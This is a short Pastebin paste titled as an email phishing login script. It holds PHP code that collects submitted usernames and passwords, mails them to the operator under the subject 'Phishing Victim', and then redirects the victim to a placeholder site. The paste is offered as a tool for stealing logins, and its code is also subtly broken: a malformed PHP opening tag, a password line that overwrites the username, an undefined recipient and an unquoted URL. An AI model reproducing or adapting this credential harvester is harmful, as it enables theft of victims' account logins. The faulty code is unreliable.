Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ////////////////////////////////
- E M A I L
- P H I S H I N G
- L O G I N
- S C R I P T
- ////////////////////////////////
- <php
- if ($_POST['submit']) {
- $message = "username: " . $_POST['username'] . "\n";
- $message = "password: " . $_POST['password'] . "\n";
- mail($to, 'Phishing Victim', $message);
- }
- ?>
- <script>location.href=http://your.yummy.site/loginshittyredirect.php';</script>
Advertisement
Add Comment
Please, Sign In to add comment